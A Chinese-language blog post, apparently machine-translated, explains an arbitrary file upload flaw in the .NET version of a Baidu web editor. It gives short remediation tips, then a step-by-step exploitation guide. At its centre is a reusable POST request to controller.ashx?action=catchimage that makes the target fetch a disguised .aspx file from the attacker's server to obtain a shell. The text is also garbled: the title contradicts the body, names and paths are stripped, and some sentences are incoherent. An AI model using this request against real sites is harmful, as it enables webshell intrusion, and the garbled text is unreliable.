您的位置  > 互联网

掌控安全学院-php,jsp漏洞利用方式心得

免费并加入群组

本文由安全大师学院投稿-

前言

前段时间,我在为某政府单位做项目时发现了这个漏洞。 虽然是老漏洞,但也是一个容易被忽视、可以快速获取shell的漏洞。 我希望我在如何利用它方面有一些不同的经验。 可以帮助一些不太了解的朋友,所以写了这篇文章。

1. 漏洞介绍 1.1 漏洞描述

它是百度开发的一款网站编辑器。 它不再被开发和更新。 该漏洞仅存在于.net版本的编辑器中。 其他php、jsp、asp版本不受此漏洞影响。 .net允许任意文件上传,绕过文件格式限制,并且在获取远程资源时不严格过滤和判断远程文件的格式。

1.2 影响范围

该漏洞影响.Net版本,其他语言版本暂时不受影响。

1.3 脆弱性原理

该漏洞产生的原因是图片资源仅在获取时进行检查,从而允许绕过任何文件的上传。

1.4 错误修复

1、修改项目目录下的net//.cs文件,添加检查文件类型的代码。

2、使用各种WAF软件,防止攻击者上传恶意文件。

3、检查文件上传路径中是否有最近上传的畸形图片; 检查是否存在asp、aspx等危险文件。 如果发现异常文件,请及时判断并删除。

2、漏洞复现优先

我们进入系统后台,通过一一查看功能点,终于在这个位置找到了一个编辑器。

第一步:

是否存在验证码漏洞:拼接漏洞URL地址

/net/.ashx?=

显示{"state":"参数错误:未指定抓取源"}

基本上你可以继续尝试利用该漏洞。

第二步:漏洞利用 1、先说一下有些人可能存在的误区。

例如:很多朋友在看网上的文章时,看到需要构造编写一个HTML文件上传脚本,将自己服务器上的图片代码上传到有漏洞的站点。

第一种:当一些不太了解的朋友在网上看到一些以下位置的重复报告时,有人会说系统不能以?命名文件。 标志,如:xxx.jpg?.aspx 格式。

第二:没有Linux服务器怎么办? 我不能在系统的服务器上使用这个问号吗? 如何处理格式化文件以及其他此类混乱。

很多朋友都被误导了。

1.1 误解和困惑

网上很多文章并没有详细解释一些看似简单的方法和步骤,但有时很容易误导不太了解的人。

这里我详细解释一下:

关键点:

第一点:即使不需要绕过图像代码内容,也可以直接使用图像代码。 有时,您可以将aspx代码更改为jpg格式,这样更容易杀死。 最终还是要看个人遇到的实际情况。

第二点:不需要使用Linux服务器,直接使用服务器即可。

从上面的实践可以看出,即使是Linux系统类型的服务器,也无法上传xxx.jpg?.aspx格式的文件。 即使该文件存在于您的服务器目录中,也会显示 404。

成功的正确方法

下图可以看到上传成功后返回的上传路径。

2.以下是我个人经验中常用推荐的方法:

(推荐给大家如果墙壁有裂缝,或者觉得麻烦又想省事的朋友)

2.1 个人推荐:数据包构建方法

原因:当你在网上上传大量的HTML文件并抓包时,你会发现上传的数据包实际上是这样的。

由此,我们可以换位思考一下,为什么不直接使用这个数据包呢? 以后每次遇到这个编辑器漏洞,都可以尝试使用这个数据包修改部分内容,直接使用。 方便快捷。

通用数据包:

POST /替换漏洞URL地址拼接/UEditor/net/controller.ashx?action=catchimage HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="100", "Chromium";v="100", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

source[]=http://替换为自己服务器开启http服务的URL地址/666.jpg?.aspx

终于上传成功了,

该编辑器还存在其他漏洞,例如SSRF、存储

这种类型的漏洞还有很多,只要细心发现就可以了。

希望这篇文章能够对大家有所帮助。 如果您觉得对您有帮助,请留言点赞!

谢谢!

免责声明:本公众号分享内容仅供讨论网络安全技术,不得用于非法用途。

所有渗透都需要授权。 违反者自行承担后果。 该账号与作者无关。 请记住遵守法律。